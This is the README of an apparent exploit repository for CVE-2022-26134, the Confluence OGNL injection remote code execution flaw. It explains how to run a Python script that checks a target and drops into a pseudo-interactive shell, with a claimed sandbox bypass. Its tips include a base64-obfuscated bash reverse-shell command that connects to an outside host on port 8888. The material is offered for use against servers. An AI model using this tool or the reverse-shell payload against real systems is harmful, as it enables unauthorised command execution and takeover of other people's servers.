[CVE-2022-26134]Confluence OGNL expression injected RCE with sandbox bypass.# CVE-2022-26134
Confluence OGNL expression injected RCE(CVE-2022-26134) poc and exp
## Update
Add sandbox bypass, high version supported.
# Usage
```
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/
```
The script will auto check target is vulnerable, and enter a pseudo-interactive shell if it's vulnerable.
Test under linux:

Test under windows:

Just input 'q' when you want to quit.
# Some tips
Command parameters are directly passed to the runtime.exec method, which does not have the context of the shell.
so.
Under Windows, some commands such as `dir` cannot be executed directly, you can use `cmd.exe /c dir`.
Under linux, some special symbols cannot take effect, If you need to execute some command with special symbols like reverse shell, you can base64 encode it and then use `bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i}`.
[4.0K] /data/pocs/765ab453007f07a33e20fc305ff0d80f8d764dd3
├── [3.4K] Confluence_cve_2022_26134_RCE.py
├── [ 34K] linux.jpg
├── [1.1K] README.md
└── [ 11K] windows.jpg
0 directories, 4 files